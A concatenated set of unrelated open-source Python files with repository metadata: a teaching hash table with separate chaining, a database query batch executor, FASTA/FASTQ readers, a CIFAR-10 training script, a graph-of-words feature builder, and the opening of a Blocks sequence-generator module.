zhangsifan/ClassicAlgorighthms
|
b769d46727279cf6d8532819076a3fef496d05c7
|
[
"Apache-2.0"
] | 1
|
2021-04-21T11:26:01.000Z
|
2021-04-21T11:26:01.000Z
|
# -*- coding: utf-8 -*-#
'''
@Project : ClassicAlgorighthms
@File : HashTable.py
@USER : ZZZZZ
@TIME : 2021/4/25 18:25
'''
class Node():
    '''
    Node used by the separate-chaining (linked list) collision resolution
    '''
def __init__(self, value = None, next = None):
self.val = value
self.next = next
class HashTable():
    '''
    A hash table is a data structure that accesses records directly by their value.
    Specifically, a key is mapped to a position in the table, which speeds up lookups.
    The mapping function is called the hash function, and the array holding the records is called the hash table.
    There are two key questions:
    1. How is a value mapped to a position?
    (1) * division method: h(k) = k mod p
    (2) mid-square method: h(k) = (value^2) >> 28
    (3) Fibonacci hashing: h(k) = (value * 2654435769 (MAX_INT32)) >> 28
    2. What should be done when two values map to the same position?
    (1) open addressing: linear rehashing, quadratic rehashing
    (2) * separate chaining: each slot stores a linked list
    (3) rehashing: build several hash functions
    Notice:
    If, with separate chaining, every list head were the root of a balanced binary tree, each slot would become a balanced BST.
    Lookup complexity would drop to log2(N), and since hashing spreads the nodes over the slots, it would run even faster in practice.
    This example uses the division method to compute hash values
    and separate chaining to resolve collisions.
    '''
def __init__(self):
        # size of the hash table
        self._table_size = 11
        # the hash table itself; every slot is a list head and new nodes are inserted at the head
        self._table = []
        for i in range(self._table_size):
            self._table.append(Node())
        # number of stored elements
        self._count = 0
def init(self, values):
        '''
        Build the hash table from a list of values
        :param values: list used to build the table
        :return: None
        '''
for value in values:
self.insert(value)
def insert(self, value):
        '''
        Insert a value into the hash table
        :param value: value to insert
        :return: None
        '''
        # find its slot
        index = self._hash(value)
        # create a node for this value
        node = Node(value = value)
        # insert it at the head of the corresponding list
        node.next = self._table[index].next
        self._table[index].next = node
        # count + 1
        self._count += 1
def delete(self, value):
        '''
        Delete a value from the hash table
        :param value: value to delete
        :return: None
        '''
        # find its hash slot
        index = self._hash(value)
        # walk the linked list
        pre_node = self._table[index]
        node = self._table[index].next
        if self.search(value) == False:
            raise Exception("no such value!")
        # Note: given the list structure, a found node could also be removed by copying the
        # next node's value into it and unlinking that next node.
        # But the found node may be the last one in the list, where that trick does not work.
        while node != None:
            # found the value, stop here
            if node.val == value:
                break
            else:
                pre_node = pre_node.next
                node = node.next
        # unlink node
        pre_node.next = node.next
def search(self, value):
        '''
        Look up a value in the hash table
        :param value: value to look for
        :return: True if the value is found, otherwise False
        '''
        # find its hash slot
        index = self._hash(value)
        # walk the linked list
        node = self._table[index]
        while node != None:
            if node.val == value:
                return True
            node = node.next
        # if we get here, the value is not in the table
        return False
    # ---------------------------- private methods ----------------------------
    def _hash(self, value):
        '''
        Hash function: compute a slot index for the given value
        :param value: value stored in the hash table
        :return: position in the hash table
        '''
return value % self._table_size
    # ---------------------------- internal methods ----------------------------
def __str__(self):
final_res = ""
for i in range(self._table_size):
res = []
node = self._table[i].next
while node != None:
res.append(str(node.val))
node = node.next
            final_res += "values at index {}: {}\n".format(i, ",".join(res))
return final_res
if __name__ == "__main__":
ht = HashTable()
    # initialization
    ht.init([2, 3, 5, 8, 9, 10, 2, 9, 1, 5, 2, 1, 7, 9, 11])
    print("hash table after initialization:\n{}".format(ht))
    # insert a node
    ht.insert(9)
    print("hash table after inserting a value:\n{}".format(ht))
    # delete a node
    ht.delete(11)
    print("hash table after deleting a value:\n{}".format(ht))
    # look up a node
    res = ht.search(8)
    print("result of searching for 8: {}".format(res))
| 23.644172
| 69
| 0.493254
| 4,575
| 0.879469
| 0
| 0
| 0
| 0
| 0
| 0
| 3,042
| 0.584775
|
3ba7a6554c459e41f8d769b9e6caea0153ae3a05
| 7,908
|
py
|
Python
|
ossdbtoolsservice/query/batch.py
|
DaeunYim/pgtoolsservice
|
b7e548718d797883027b2caee2d4722810b33c0f
|
[
"MIT"
] | 33
|
2019-05-27T13:04:35.000Z
|
2022-03-17T13:33:05.000Z
|
ossdbtoolsservice/query/batch.py
|
DaeunYim/pgtoolsservice
|
b7e548718d797883027b2caee2d4722810b33c0f
|
[
"MIT"
] | 31
|
2019-06-10T01:55:47.000Z
|
2022-03-09T07:27:49.000Z
|
ossdbtoolsservice/query/batch.py
|
DaeunYim/pgtoolsservice
|
b7e548718d797883027b2caee2d4722810b33c0f
|
[
"MIT"
] | 25
|
2019-05-13T18:39:24.000Z
|
2021-11-16T03:07:33.000Z
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from enum import Enum
from typing import List # noqa
from datetime import datetime
import uuid
import sqlparse
from ossdbtoolsservice.driver import ServerConnection
from ossdbtoolsservice.utils.time import get_time_str, get_elapsed_time_str
from ossdbtoolsservice.query.contracts import BatchSummary, SaveResultsRequestParams, SelectionData
from ossdbtoolsservice.query.result_set import ResultSet # noqa
from ossdbtoolsservice.query.file_storage_result_set import FileStorageResultSet
from ossdbtoolsservice.query.in_memory_result_set import InMemoryResultSet
from ossdbtoolsservice.query.data_storage import FileStreamFactory
from ossdbtoolsservice.utils.constants import PG_PROVIDER_NAME
class ResultSetStorageType(Enum):
IN_MEMORY = 1,
FILE_STORAGE = 2
class BatchEvents:
def __init__(self, on_execution_started=None, on_execution_completed=None, on_result_set_completed=None):
self._on_execution_started = on_execution_started
self._on_execution_completed = on_execution_completed
self._on_result_set_completed = on_result_set_completed
class SelectBatchEvents(BatchEvents):
def __init__(self, on_execution_started, on_execution_completed, on_result_set_completed, on_after_first_fetch):
BatchEvents.__init__(self, on_execution_started, on_execution_completed, on_result_set_completed)
self._on_after_first_fetch = on_after_first_fetch
class Batch:
def __init__(
self,
batch_text: str,
ordinal: int,
selection: SelectionData,
batch_events: BatchEvents = None,
storage_type: ResultSetStorageType = ResultSetStorageType.FILE_STORAGE
) -> None:
self.id = ordinal
self.selection = selection
self.batch_text = batch_text
self._execution_start_time: datetime = None
self._has_error = False
self._has_executed = False
self._execution_end_time: datetime = None
self._result_set: ResultSet = None
self._notices: List[str] = []
self._batch_events = batch_events
self._storage_type = storage_type
@property
def batch_summary(self) -> BatchSummary:
return BatchSummary.from_batch(self)
@property
def has_error(self) -> bool:
return self._has_error
@property
def has_executed(self) -> bool:
return self._has_executed
@property
def start_date_str(self) -> str:
if self._execution_start_time is None:
return None
return self._execution_start_time.isoformat()
@property
def start_time(self) -> str:
return get_time_str(self._execution_start_time)
@property
def end_time(self) -> str:
return get_time_str(self._execution_end_time)
@property
def elapsed_time(self) -> str:
return get_elapsed_time_str(self._execution_start_time, self._execution_end_time)
@property
def result_set(self) -> ResultSet:
return self._result_set
@property
def row_count(self) -> int:
return self.result_set.row_count if self.result_set is not None else -1
@property
def notices(self) -> List[str]:
return self._notices
def get_cursor(self, connection: ServerConnection):
return connection.cursor()
def execute(self, conn: ServerConnection) -> None:
"""
Execute the batch using a cursor retrieved from the given connection
:raises DatabaseError: if an error is encountered while running the batch's query
"""
self._execution_start_time = datetime.now()
if self._batch_events and self._batch_events._on_execution_started:
self._batch_events._on_execution_started(self)
cursor = self.get_cursor(conn)
try:
cursor.execute(self.batch_text)
# Commit the transaction if autocommit is True
if conn.autocommit:
conn.commit()
self.after_execute(cursor)
except conn.database_error as error:
self._has_error = True
raise error
finally:
# We are doing this because when the execute fails for named cursors
# cursor is not activated on the server which results in failure on close
# Hence we are checking if the cursor was really executed for us to close it
if cursor and cursor.rowcount != -1 and cursor.rowcount is not None:
cursor.close()
self._has_executed = True
self._execution_end_time = datetime.now()
# TODO: PyMySQL doesn't support notices from a connection
if conn._provider_name == PG_PROVIDER_NAME:
self._notices = cursor.connection.notices
cursor.connection.notices = []
if self._batch_events and self._batch_events._on_execution_completed:
self._batch_events._on_execution_completed(self)
def after_execute(self, cursor) -> None:
if cursor.description is not None:
self.create_result_set(cursor)
def create_result_set(self, cursor):
result_set = create_result_set(self._storage_type, 0, self.id)
result_set.read_result_to_end(cursor)
self._result_set = result_set
def get_subset(self, start_index: int, end_index: int):
return self._result_set.get_subset(start_index, end_index)
def save_as(self, params: SaveResultsRequestParams, file_factory: FileStreamFactory, on_success, on_failure) -> None:
if params.result_set_index != 0:
raise IndexError('Result set index should be always 0')
self._result_set.save_as(params, file_factory, on_success, on_failure)
class SelectBatch(Batch):
def __init__(self, batch_text: str, ordinal: int, selection: SelectionData, batch_events: SelectBatchEvents, storage_type: ResultSetStorageType) -> None:
Batch.__init__(self, batch_text, ordinal, selection, batch_events, storage_type)
def get_cursor(self, connection: ServerConnection):
cursor_name = str(uuid.uuid4())
# Named cursors can be created only in the transaction. As our connection has autocommit set to true
# there is not transaction concept with it so we need to have withhold to true and as this cursor is local
# and we explicitly close it we are good
return connection.cursor(name=cursor_name, withhold=True)
def after_execute(self, cursor) -> None:
super().create_result_set(cursor)
def create_result_set(storage_type: ResultSetStorageType, result_set_id: int, batch_id: int) -> ResultSet:
if storage_type is ResultSetStorageType.FILE_STORAGE:
return FileStorageResultSet(result_set_id, batch_id)
return InMemoryResultSet(result_set_id, batch_id)
def create_batch(batch_text: str, ordinal: int, selection: SelectionData, batch_events: BatchEvents, storage_type: ResultSetStorageType) -> Batch:
sql = sqlparse.parse(batch_text)
statement = sql[0]
if statement.get_type().lower() == 'select':
into_checker = [True for token in statement.tokens if token.normalized == 'INTO']
cte_checker = [True for token in statement.tokens if token.ttype == sqlparse.tokens.Keyword.CTE]
if len(into_checker) == 0 and len(cte_checker) == 0: # SELECT INTO and CTE keywords can't be used in named cursor
return SelectBatch(batch_text, ordinal, selection, batch_events, storage_type)
return Batch(batch_text, ordinal, selection, batch_events, storage_type)
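# Usage sketch (hypothetical wiring; the ServerConnection and SelectionData instances come
# from the surrounding ossdbtoolsservice machinery and are not constructed here):
#   batch = create_batch("SELECT 1", 0, selection, BatchEvents(), ResultSetStorageType.IN_MEMORY)
#   batch.execute(connection)            # runs the text through a (possibly named) cursor
#   summary = batch.batch_summary        # BatchSummary built from the executed batch
#   rows = batch.get_subset(0, batch.row_count)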
| 38.38835
| 157
| 0.69221
| 5,822
| 0.736216
| 0
| 0
| 1,023
| 0.129363
| 0
| 0
| 1,213
| 0.153389
|
3ba806cb9a29badf3e7a080781be0d67fc995823
| 1,017
|
py
|
Python
|
seqlib.py
|
rvenkatesh99/sequence_alignment
|
107c262ef25ddbf025e054339bdd29efd728033a
|
[
"MIT"
] | null | null | null |
seqlib.py
|
rvenkatesh99/sequence_alignment
|
107c262ef25ddbf025e054339bdd29efd728033a
|
[
"MIT"
] | null | null | null |
seqlib.py
|
rvenkatesh99/sequence_alignment
|
107c262ef25ddbf025e054339bdd29efd728033a
|
[
"MIT"
] | null | null | null |
import gzip
def read_fasta(filename):
name = None
seqs = []
fp = None
if filename.endswith('.gz'):
fp = gzip.open(filename, 'rt')
else:
fp = open(filename)
for line in fp.readlines():
line = line.rstrip()
if line.startswith('>'):
if len(seqs) > 0:
seq = ''.join(seqs)
yield(name, seq)
name = line[1:]
seqs = []
else:
name = line[1:]
else:
seqs.append(line)
yield(name, ''.join(seqs))
fp.close()
def read_fastq(filename):
    name = None
    seqs = []
    quals = []
    in_quals = False
    fp = None
    if filename.endswith('.gz'):
        fp = gzip.open(filename, 'rt')
    else:
        fp = open(filename)
    for line in fp.readlines():
        line = line.rstrip()
        # only treat '@' as a header when not inside a quality block,
        # because quality strings may legitimately start with '@'
        if line.startswith('@') and not in_quals:
            if len(seqs) > 0:
                yield(name, ''.join(seqs), ''.join(quals))
            name = line[1:]
            seqs = []
            quals = []
        elif line.startswith('+') and not in_quals:
            # separator line: quality lines follow
            in_quals = True
        elif in_quals:
            quals.append(line)
            # the quality string has the same length as the sequence
            if len(''.join(quals)) >= len(''.join(seqs)):
                in_quals = False
        else:
            seqs.append(line)
    yield(name, ''.join(seqs), ''.join(quals))
    fp.close()
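# Usage sketch: both readers are generators, so large (optionally gzip-compressed)
# files can be streamed without loading them whole. The file name is a placeholder.
if __name__ == '__main__':
    for name, seq in read_fasta('example.fa.gz'):
        print(name, len(seq))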
| 17.237288
| 43
| 0.573255
| 0
| 0
| 1,001
| 0.984267
| 0
| 0
| 0
| 0
| 39
| 0.038348
|
3ba896ffed28499b8d1d9a50c6e51c5241f414aa
| 2,413
|
py
|
Python
|
train.py
|
adamian98/LabelNoiseFlatMinimizers
|
2c7a60ea0b72f8ac3a0ce3f059526440385b4f60
|
[
"MIT"
] | 7
|
2021-08-21T23:45:28.000Z
|
2021-12-13T13:39:38.000Z
|
train.py
|
adamian98/LabelNoiseFlatMinimizers
|
2c7a60ea0b72f8ac3a0ce3f059526440385b4f60
|
[
"MIT"
] | null | null | null |
train.py
|
adamian98/LabelNoiseFlatMinimizers
|
2c7a60ea0b72f8ac3a0ce3f059526440385b4f60
|
[
"MIT"
] | null | null | null |
import torch
from pytorch_lightning import Trainer, seed_everything
from pytorch_lightning.loggers import WandbLogger
from pytorch_lightning.callbacks import LearningRateMonitor
from data import CIFAR10Data
from module import CIFAR10Module
from callbacks import *
from pathlib import Path
import wandb
from absl import app
from absl import flags
FLAGS = flags.FLAGS
flags.DEFINE_string("name", None, "name used for wandb logger")
flags.DEFINE_string("init", None, "initial weights to use")
flags.DEFINE_integer("max_epochs", 1000, "number of epochs to run for")
flags.DEFINE_integer("precision", 32, "precision to use")
flags.DEFINE_integer("seed", 0, "random seed")
flags.DEFINE_integer("num_workers", 4, "number of workers to use for data loading")
flags.DEFINE_string("save", None, "output file to save model weights")
flags.DEFINE_bool("callbacks", True, "whether to compute gradient callbacks")
flags.DEFINE_bool(
"fullbatch", False, "whether to aggregate batches to emulate full batch training"
)
def main(argv):
seed_everything(FLAGS.seed)
logger = WandbLogger(project="colt_final", name=FLAGS.name)
logger.experiment.config.update(FLAGS)
model = CIFAR10Module()
if FLAGS.init is not None:
model.load_state_dict(torch.load(Path(FLAGS.init)))
data = CIFAR10Data()
if FLAGS.callbacks:
callbacks = [
LearningRateMonitor(log_momentum=True),
TimeEpoch(),
TotalGradient(),
WeightNorm(),
]
else:
callbacks = [LearningRateMonitor(log_momentum=True), TimeEpoch()]
if FLAGS.fullbatch:
accumulate_grad_batches = 50000 // FLAGS.batch_size
log_every_n_steps = 1
else:
accumulate_grad_batches = 1
log_every_n_steps = 50
trainer = Trainer(
logger=logger,
gpus=1,
max_epochs=FLAGS.max_epochs,
callbacks=callbacks,
progress_bar_refresh_rate=50,
log_every_n_steps=log_every_n_steps,
precision=FLAGS.precision,
deterministic=True,
benchmark=True,
terminate_on_nan=True,
accumulate_grad_batches=accumulate_grad_batches,
)
trainer.fit(model, data)
if FLAGS.save:
save_file = Path(FLAGS.save)
save_file.parent.mkdir(exist_ok=True, parents=True)
torch.save(model.state_dict(), save_file)
if __name__ == "__main__":
app.run(main)
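# Example invocation (a sketch; only the flags defined above are used, and the run and
# output names are placeholders):
#   python train.py --name=baseline --seed=0 --max_epochs=200 --precision=32 \
#       --callbacks=True --fullbatch=False --save=checkpoints/baseline.pt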
| 30.544304
| 85
| 0.703274
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 394
| 0.163282
|
3ba9c357940e99f10b2151b5ccc410817c1d8e70
| 10,559
|
py
|
Python
|
test/lda/createGraphFeatures.py
|
bekou/graph-topic-model
|
7bd99aede6c22675f738166e690174ae0917b9eb
|
[
"MIT"
] | 6
|
2020-01-17T13:23:35.000Z
|
2022-01-15T22:49:34.000Z
|
learn/lda/createGraphFeatures.py
|
bekou/graph-topic-model
|
7bd99aede6c22675f738166e690174ae0917b9eb
|
[
"MIT"
] | null | null | null |
learn/lda/createGraphFeatures.py
|
bekou/graph-topic-model
|
7bd99aede6c22675f738166e690174ae0917b9eb
|
[
"MIT"
] | 1
|
2019-05-26T15:57:35.000Z
|
2019-05-26T15:57:35.000Z
|
import networkx as nx
import string
import numpy as np
import math
def degree_centrality(G):
centrality={}
s=1.0
centrality=dict((n,d*s) for n,d in G.degree_iter())
return centrality
def in_degree_centrality(G):
if not G.is_directed():
raise nx.NetworkXError("in_degree_centrality() not defined for undirected graphs.")
centrality={}
s=1.0
centrality=dict((n,d*s) for n,d in G.in_degree_iter())
return centrality
def out_degree_centrality(G):
if not G.is_directed():
raise nx.NetworkXError("out_degree_centrality() not defined for undirected graphs.")
centrality={}
s=1.0
centrality=dict((n,d*s) for n,d in G.out_degree_iter())
return centrality
def weighted_centrality(G):
centrality={}
s=1.0
centrality=dict((n,d*s) for n,d in G.degree_iter(weight='weight'))
return centrality
def createGraphFeatures(num_documents,clean_train_documents,unique_words,sliding_window,b,idf_par,centrality_par,centrality_col_par):
features = np.zeros((num_documents,len(unique_words)))
term_num_docs = {}
print "Creating the graph of words for collection..."
if centrality_col_par=="pagerank_centrality" or centrality_col_par=="out_degree_centrality" or centrality_col_par=="in_degree_centrality" or centrality_col_par=="betweenness_centrality_directed" or centrality_col_par=="closeness_centrality_directed":
dGcol = nx.DiGraph()
else:
dGcol = nx.Graph()
totalLen = 0
for i in range(0,num_documents):
#dG = nx.Graph()
found_unique_words = []
wordList1 = clean_train_documents[i].split(None)
wordList2 = [string.rstrip(x.lower(), ',.!?;') for x in wordList1]
docLen = len(wordList2)
totalLen += docLen
# print clean_train_documents[i]
for k, word in enumerate(wordList2):
if word not in found_unique_words:
found_unique_words.append(word)
if word not in term_num_docs:
term_num_docs[word] = 1
else:
term_num_docs[word] += 1
for j in xrange(1,sliding_window):
try:
next_word = wordList2[k + j]
if not dGcol.has_node(word):
dGcol.add_node(word)
dGcol.node[word]['count'] = 1
else:
dGcol.node[word]['count'] += 1
if not dGcol.has_node(next_word):
dGcol.add_node(next_word)
dGcol.node[next_word]['count'] = 0
if not dGcol.has_edge(word, next_word):
dGcol.add_edge(word, next_word, weight = 1)
else:
dGcol.edge[word][next_word]['weight'] += 1
except IndexError:
if not dGcol.has_node(word):
dGcol.add_node(word)
dGcol.node[word]['count'] = 1
else:
dGcol.node[word]['count'] += 1
except:
raise
avgLen = float(totalLen)/num_documents
print "Number of nodes in collection graph:"+str(dGcol.number_of_nodes())
print "Number of edges in collection graph:"+str(dGcol.number_of_edges())
print "Average document length:"+str(avgLen)
print "Number of self-loops for collection graph:"+str(dGcol.number_of_selfloops())
if idf_par=="icw":
icw_col = {}
dGcol.remove_edges_from(dGcol.selfloop_edges())
nx.write_edgelist(dGcol, "test.edgelist")
if centrality_col_par=="degree_centrality":
centrality_col = nx.degree_centrality(dGcol)
elif centrality_col_par=="pagerank_centrality":
centrality_col = pg.pagerank(dGcol)
# centrality_col = nx.pagerank(dGcol)
elif centrality_col_par=="eigenvector_centrality":
centrality_col = nx.eigenvector_centrality(dGcol,max_iter=10000,weight="weight")
elif centrality_col_par=="katz_centrality":
centrality_col = nx.katz_centrality(dGcol)
elif centrality_col_par=="betweenness_centrality" or centrality_col_par=="betweenness_centrality_directed":
centrality_col = nx.betweenness_centrality(dGcol)
elif centrality_col_par=="triangles":
centrality_col = nx.triangles(dGcol)
elif centrality_col_par=="clustering_coefficient":
centrality_col = nx.clustering(dGcol)
elif centrality_col_par=="in_degree_centrality":
centrality_col = nx.in_degree_centrality(dGcol)
elif centrality_col_par=="out_degree_centrality":
centrality_col = nx.out_degree_centrality(dGcol)
elif centrality_col_par=="core_number":
centrality_col = nx.core_number(dGcol)
elif centrality_col_par=="closeness_centrality" or centrality_col_par=="closeness_centrality_directed":
centrality_col = nx.closeness_centrality(dGcol,normalized=False)
elif centrality_col_par=="communicability_centrality":
centrality_col = nx.communicability_centrality(dGcol)
centr_sum = sum(centrality_col.values())
for k, g in enumerate(dGcol.nodes()):
if centrality_col[g]>0:
icw_col[g] = math.log10((float(centr_sum)) / (centrality_col[g]))
else:
icw_col[g] = 0
idf_col = {}
for x in term_num_docs:
idf_col[x] = math.log10((float(num_documents)+1.0) / (term_num_docs[x]))
print "Creating the graph of words for each document..."
totalNodes = 0
totalEdges = 0
for i in range( 0,num_documents ):
if centrality_par=="pagerank_centrality" or centrality_par=="out_degree_centrality" or centrality_par=="in_degree_centrality" or centrality_par=="betweenness_centrality_directed" or centrality_par=="closeness_centrality_directed":
dG = nx.DiGraph()
else:
dG = nx.Graph()
wordList1 = clean_train_documents[i].split(None)
wordList2 = [string.rstrip(x.lower(), ',.!?;') for x in wordList1]
docLen = len(wordList2)
if docLen==2 :
print wordList2
if docLen>1 and wordList2[0]!=wordList2[1] :
# print clean_train_documents[i]
for k, word in enumerate(wordList2):
for j in xrange(1,sliding_window):
try:
next_word = wordList2[k + j]
if not dG.has_node(word):
dG.add_node(word)
dG.node[word]['count'] = 1
else:
dG.node[word]['count'] += 1
if not dG.has_node(next_word):
dG.add_node(next_word)
dG.node[next_word]['count'] = 0
if not dG.has_edge(word, next_word):
dG.add_edge(word, next_word, weight = 1)
else:
dG.edge[word][next_word]['weight'] += 1
except IndexError:
if not dG.has_node(word):
dG.add_node(word)
dG.node[word]['count'] = 1
else:
dG.node[word]['count'] += 1
except:
raise
dG.remove_edges_from(dG.selfloop_edges())
if centrality_par=="degree_centrality":
#centrality = nx.degree_centrality(dG)
centrality=degree_centrality(dG)
elif centrality_par=="clustering_coefficient":
centrality = nx.clustering(dG)
elif centrality_par=="pagerank_centrality":
# centrality = pg.pagerank(dG,max_iter=10000)
centrality = nx.pagerank(dG)
elif centrality_par=="eigenvector_centrality":
centrality=nx.eigenvector_centrality(dG,max_iter=10000)
elif centrality_par=="katz_centrality":
centrality = nx.katz_centrality(dG,normalized=False)
elif centrality_par=="betweenness_centrality" or centrality_par=="betweenness_centrality_directed":
centrality = nx.betweenness_centrality(dG,normalized=False)
elif centrality_par=="triangles":
centrality = nx.triangles(dG)
elif centrality_par=="in_degree_centrality":
centrality = in_degree_centrality(dG)
elif centrality_par=="out_degree_centrality":
centrality = out_degree_centrality(dG)
elif centrality_par=="core_number":
centrality = nx.core_number(dG)
elif centrality_par=="weighted_centrality":
centrality = weighted_centrality(dG)
elif centrality_par=="closeness_centrality" or centrality_par=="closeness_centrality_directed":
centrality = nx.closeness_centrality(dG,normalized=False)
elif centrality_par=="communicability_centrality":
centrality = nx.communicability_centrality(dG)
totalNodes += dG.number_of_nodes()
totalEdges += dG.number_of_edges()
#print "Number of self-loops:"+str(dG.number_of_selfloops())
#centrality = nx.out_degree_centrality(dG)
#centrality = nx.katz_centrality(dG,max_iter=10000)
for k, g in enumerate(dG.nodes()):
# Degree centrality (local feature)
if g in unique_words:
#features[i,unique_words.index(g)] = dG.degree(nbunch=g,weight='weight') * idf_col[g]
if idf_par=="no":
features[i,unique_words.index(g)] = centrality[g]#centrality[g]/(1-b+(b*(float(docLen)/avgLen)))dG.node[g]['count']
elif idf_par=="idf":
features[i,unique_words.index(g)] = (centrality[g]/(1-b+(b*(float(docLen)/avgLen)))) * idf_col[g]
elif idf_par=="icw":
features[i,unique_words.index(g)] = (centrality[g]/(1-b+(b*(float(docLen)/avgLen)))) * icw_col[g]
print "Average number of nodes:"+str(float(totalNodes)/num_documents)
print "Average number of edges:"+str(float(totalEdges)/num_documents)
return features
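# Usage sketch (illustration only; the toy documents and parameter values below are made up):
#   docs = ["the cat sat on the mat", "the dog chased the cat"]
#   vocab = sorted(set(" ".join(docs).split()))
#   feats = createGraphFeatures(len(docs), docs, vocab, sliding_window=3, b=0.003,
#                               idf_par="idf", centrality_par="degree_centrality",
#                               centrality_col_par="degree_centrality")
# Each row of feats holds the graph-of-words weights of one document over vocab.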
| 43.632231
| 254
| 0.58604
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,008
| 0.19017
|
3bab2d583dbdb20d52e61488899227c07f7c4954
| 30,867
|
py
|
Python
|
blocks/bricks/sequence_generators.py
|
KIKOcaoyue/blocks
|
dfbeb400cfacfc1abe75e377cc03c1bf61b9c2fa
|
[
"BSD-3-Clause"
] | 1,067
|
2015-05-16T23:39:15.000Z
|
2019-02-10T13:33:00.000Z
|
blocks/bricks/sequence_generators.py
|
loveisbasa/blocks
|
7f380deec8f810b390880e6a4de836115e6e478d
|
[
"BSD-3-Clause"
] | 577
|
2015-05-16T18:52:53.000Z
|
2018-11-27T15:31:09.000Z
|
blocks/bricks/sequence_generators.py
|
loveisbasa/blocks
|
7f380deec8f810b390880e6a4de836115e6e478d
|
[
"BSD-3-Clause"
] | 379
|
2015-05-21T03:24:04.000Z
|
2019-01-29T02:55:00.000Z
|
"""Sequence generation framework.
Recurrent networks are often used to generate/model sequences.
Examples include language modelling, machine translation, handwriting
synthesis, etc. A typical pattern in this context is that
sequence elements are generated one after another, and every generated
element is fed back into the recurrent network state. Sometimes
also an attention mechanism is used to condition sequence generation
on some structured input like another sequence or an image.
This module provides :class:`SequenceGenerator` that builds a sequence
generating network from three main components:
* a core recurrent transition, e.g. :class:`~blocks.bricks.recurrent.LSTM`
or :class:`~blocks.bricks.recurrent.GatedRecurrent`
* a readout component that can produce sequence elements using
the network state and the information from the attention mechanism
* an attention mechanism (see :mod:`~blocks.bricks.attention` for
more information)
Implementation-wise :class:`SequenceGenerator` fully relies on
:class:`BaseSequenceGenerator`. At the level of the latter an
attention is mandatory, moreover it must be a part of the recurrent
transition (see :class:`~blocks.bricks.attention.AttentionRecurrent`).
To simulate optional attention, :class:`SequenceGenerator` wraps the
pure recurrent network in :class:`FakeAttentionRecurrent`.
"""
from abc import ABCMeta, abstractmethod
from six import add_metaclass
from theano import tensor
from blocks.bricks import Initializable, Random, Bias, NDimensionalSoftmax
from blocks.bricks.base import application, Brick, lazy
from blocks.bricks.parallel import Fork, Merge
from blocks.bricks.lookup import LookupTable
from blocks.bricks.recurrent import recurrent
from blocks.bricks.attention import (
AbstractAttentionRecurrent, AttentionRecurrent)
from blocks.roles import add_role, COST
from blocks.utils import dict_union, dict_subset
class BaseSequenceGenerator(Initializable):
r"""A generic sequence generator.
This class combines two components, a readout network and an
attention-equipped recurrent transition, into a context-dependent
    sequence generator. A third component must also be given, which
forks feedback from the readout network to obtain inputs for the
transition.
The class provides two methods: :meth:`generate` and :meth:`cost`. The
former is to actually generate sequences and the latter is to compute
the cost of generating given sequences.
The generation algorithm description follows.
**Definitions and notation:**
* States :math:`s_i` of the generator are the states of the transition
as specified in `transition.state_names`.
* Contexts of the generator are the contexts of the
transition as specified in `transition.context_names`.
* Glimpses :math:`g_i` are intermediate entities computed at every
generation step from states, contexts and the previous step glimpses.
They are computed in the transition's `apply` method when not given
or by explicitly calling the transition's `take_glimpses` method. The
set of glimpses considered is specified in
`transition.glimpse_names`.
* Outputs :math:`y_i` are produced at every step and form the output
sequence. A generation cost :math:`c_i` is assigned to each output.
**Algorithm:**
1. Initialization.
.. math::
y_0 = readout.initial\_outputs(contexts)\\
s_0, g_0 = transition.initial\_states(contexts)\\
i = 1\\
By default all recurrent bricks from :mod:`~blocks.bricks.recurrent`
have trainable initial states initialized with zeros. Subclass them
or :class:`~blocks.bricks.recurrent.BaseRecurrent` directly to get
custom initial states.
2. New glimpses are computed:
.. math:: g_i = transition.take\_glimpses(
s_{i-1}, g_{i-1}, contexts)
3. A new output is generated by the readout and its cost is
computed:
.. math::
f_{i-1} = readout.feedback(y_{i-1}) \\
r_i = readout.readout(f_{i-1}, s_{i-1}, g_i, contexts) \\
y_i = readout.emit(r_i) \\
c_i = readout.cost(r_i, y_i)
Note that the *new* glimpses and the *old* states are used at this
step. The reason for not merging all readout methods into one is
to make an efficient implementation of :meth:`cost` possible.
4. New states are computed and iteration is done:
.. math::
f_i = readout.feedback(y_i) \\
s_i = transition.compute\_states(s_{i-1}, g_i,
fork.apply(f_i), contexts) \\
i = i + 1
5. Back to step 2 if the desired sequence
length has not been yet reached.
| A scheme of the algorithm described above follows.
.. image:: /_static/sequence_generator_scheme.png
:height: 500px
:width: 500px
..
Parameters
----------
readout : instance of :class:`AbstractReadout`
The readout component of the sequence generator.
transition : instance of :class:`AbstractAttentionRecurrent`
The transition component of the sequence generator.
fork : :class:`~.bricks.Brick`
The brick to compute the transition's inputs from the feedback.
See Also
--------
:class:`.Initializable` : for initialization parameters
:class:`SequenceGenerator` : more user friendly interface to this\
brick
"""
@lazy()
def __init__(self, readout, transition, fork, **kwargs):
self.readout = readout
self.transition = transition
self.fork = fork
children = [self.readout, self.fork, self.transition]
kwargs.setdefault('children', []).extend(children)
super(BaseSequenceGenerator, self).__init__(**kwargs)
@property
def _state_names(self):
return self.transition.compute_states.outputs
@property
def _context_names(self):
return self.transition.apply.contexts
@property
def _glimpse_names(self):
return self.transition.take_glimpses.outputs
def _push_allocation_config(self):
# Configure readout. That involves `get_dim` requests
# to the transition. To make sure that it answers
# correctly we should finish its configuration first.
self.transition.push_allocation_config()
transition_sources = (self._state_names + self._context_names +
self._glimpse_names)
self.readout.source_dims = [self.transition.get_dim(name)
if name in transition_sources
else self.readout.get_dim(name)
for name in self.readout.source_names]
# Configure fork. For similar reasons as outlined above,
# first push `readout` configuration.
self.readout.push_allocation_config()
feedback_name, = self.readout.feedback.outputs
self.fork.input_dim = self.readout.get_dim(feedback_name)
self.fork.output_dims = self.transition.get_dims(
self.fork.apply.outputs)
@application
def cost(self, application_call, outputs, mask=None, **kwargs):
"""Returns the average cost over the minibatch.
The cost is computed by averaging the sum of per token costs for
each sequence over the minibatch.
.. warning::
Note that, the computed cost can be problematic when batches
consist of vastly different sequence lengths.
Parameters
----------
outputs : :class:`~tensor.TensorVariable`
The 3(2) dimensional tensor containing output sequences.
The axis 0 must stand for time, the axis 1 for the
position in the batch.
mask : :class:`~tensor.TensorVariable`
The binary matrix identifying fake outputs.
Returns
-------
cost : :class:`~tensor.Variable`
Theano variable for cost, computed by summing over timesteps
and then averaging over the minibatch.
Notes
-----
The contexts are expected as keyword arguments.
Adds average cost per sequence element `AUXILIARY` variable to
